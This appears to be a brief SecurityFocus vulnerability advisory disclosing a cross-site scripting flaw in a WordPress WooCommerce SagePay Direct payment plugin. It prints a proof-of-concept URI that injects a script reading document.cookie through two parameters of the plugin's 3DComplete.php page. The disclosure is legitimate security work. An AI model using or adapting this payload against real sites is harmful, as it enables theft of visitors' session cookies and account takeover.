WordPress WooCommerce SagePay Direct Payment Gateway Plugin Cross Site Scripting Vulnerability

Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

The following example URI is available:

http://www.example.com/wordpress/wp-content/wp-plugs/sagepay-direct-for-woocommerce-payment-gateway/pages/3DComplete.php?MD=MD%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&PARes=PARes%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&


 

Privacy Statement
Copyright 2010, SecurityFocus